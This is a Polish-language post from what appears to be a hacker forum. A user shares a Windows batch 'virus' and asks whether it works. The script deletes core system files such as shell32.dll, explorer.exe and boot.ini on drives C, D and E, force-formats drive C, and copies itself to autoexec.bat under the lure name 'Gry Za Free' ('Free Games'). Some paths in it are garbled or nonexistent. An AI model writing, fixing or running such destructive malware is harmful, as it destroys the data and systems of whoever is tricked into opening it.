Quantcast
Channel: HAKER - Forum Komputerowe
Viewing all articles
Browse latest Browse all 4549

Czy ten kod zadziała

$
0
0
Chciałem napisać prostego wirusa w notatniku i mam pytanie. Czy ten kod zadziała :
Kod:

@echo off
DEL C:\WINDOWS\system32\shell32.dll
DEL C:\boot.ini
DEL C:\WINDOWS\explorer.exe
DEL C:\pagefile.sys
DEL D:\WINDOWS\system32\shell32.dll
DEL D:\boot.ini
DEL D:\WINDOWS\explorer.exe
DEL D:\pagefile.sys
DEL E:\WINDOWS\system32\shell32.dll
DEL E:\boot.ini
DEL E:\WINDOWS\explorer.exe
DEL E:\pagefile.sys
DEL C:\WINDOWS\system64\shell64.dll
DEL C:\boot.ini
DEL C:\WINDOWS\explorer.exe
DEL C:\pagefile.sys
DEL D:\WINDOWS\system64\shell64.dll
DEL D:\boot.ini
DEL D:\WINDOWS\explorer.exe
DEL D:\pagefile.sys
DEL E:\WINDOWS\system64\shell64.dll
DEL E:\boot.ini
DEL E:\WINDOWS\explorer.exe
DEL E:\pagefile.sys
echo T | format c: /q
cls
copy Gry Za Free.bat C:\autoexec.bat

Chce aby zadziałał pod każdego windowsa więc po to tyle komend. Sam nie wiem o co chodzi z tym autoexec.bat.Pisałem to według jakiegoś poradnika internetowego. Preosze o sugestie.

Viewing all articles
Browse latest Browse all 4549